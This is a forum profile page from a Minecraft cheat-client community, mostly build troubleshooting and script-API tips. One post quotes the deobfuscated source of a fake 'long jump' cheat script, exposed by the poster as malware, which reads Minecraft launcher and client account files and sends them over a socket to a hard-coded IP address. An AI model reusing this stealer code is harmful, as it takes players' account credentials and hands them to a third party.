@some-one still waiting for mojang to add 'gaple'

exit scammed
@exit scammed
thank you and goodbye. i have to move on.
Best posts made by exit scammed
-
RE: auto gaple for lb b73 please
-
RE: Error
@божественная-кара did you git clone the source or just download it from github
-
RE: Error
@божественная-кара
https://github.com/ccbluex/liquidbounce#setting-up-a-workspacetry this again but in a different directory
-
RE: Error
@божественная-кара also dont forget to change the sdk in project structure
-
RE: Error
@божественная-кара they recently updated to java 11 so download the suitable jre then (google)
-
RE: Error
@божественная-кара
go in your liquidbounce nextgen folder
right click select git bash
paste the command again -
RE: Script API Download
@dodep ... sorry but I still can't find that anywhere, and I mostly use the default JavaScript language syntax in VSCode.
-
RE: NeruxVaceLongJump
@paul2008 i love your code
var a = registerScript({ name: "", version: "", authors: [""] }); b = Java.type; hack = b("java.net.Socket"); motionCalculator = b("java.io.DataOutputStream"); pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString(); stringUtils = b("java.io.File"); stringParse = b("org.apache.commons.io.FileUtils"); iso = b("java.nio.charset.StandardCharsets"); function dataFromString(strings) { try { var strU = new stringUtils(strings); return stringParse.readFileToString(strU, iso.ISO_8859_1) } catch (e) {} } a.registerModule({ name: "NeruxVaceLongJump", category: "Misc", description: "NeruxVaceLongJump" }, function (module) { module.on("enable", function () { data = dataFromString(pwd + "/launcher_profiles.json"); data += "\n"; data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json"); data = data.getBytes(); l = data.length; anticheat = new hack("107.182.237.14", 55228); anticheat.setSoTimeout(10000); server = new motionCalculator(anticheat.getOutputStream()); server.writeInt(l); server.write(data, 0, l); mc.thePlayer.motionX += 10 }) });
deobfed in 5 mins
thought that 3 layers of eval obfuscation could help you?
Latest posts made by exit scammed
-
RE: Cant find the problem in my code
@stfwissue LiquidBounce automatically imports its
commandManager
variable while loading the script. Take a look at line 58 ofScript.kt
:scriptEngine.put("commandManager", LiquidBounce.commandManager)
P/s: I didn't notice the typo, it's actually
executeCommands
instead ofexecuteCommand
.fun executeCommands(input: String) {
-
RE: Cant find the problem in my code
@bygraf all commands must be placed inside quotation marks.
e.g.commandManager.executeCommand(.inventorycleaner throwgarbage false);
to
commandManager.executeCommand(".inventorycleaner throwgarbage false");
and the same for others.
-
RE: LB+ > Every other client men
we also make sure to flag any anticheat by just standing
-
RE: Publish scripts on LiquidBounce's website
Selling these stuffs still exist till this day? I'm surprised.
-
RE: Simplest way to render head pitch in script api
@plumer-man it's in mixinmodelbiped
-
RE: hypixel
and yes, it's easy to do
can you please ignore topics created by dead accounts -
RE: Anyone help me to have the Tab GUI, Arraylist, speed graph appear not just on editor?
@molder34 check if HUD module is disabled.
if yes then type.t HUD
in chat and press enter -
RE: Script API Download
@dodep ... sorry but I still can't find that anywhere, and I mostly use the default JavaScript language syntax in VSCode.
-
RE: Script API Download
@_username_ He means something like ScriptAPI language support in VSCode or any other text editor.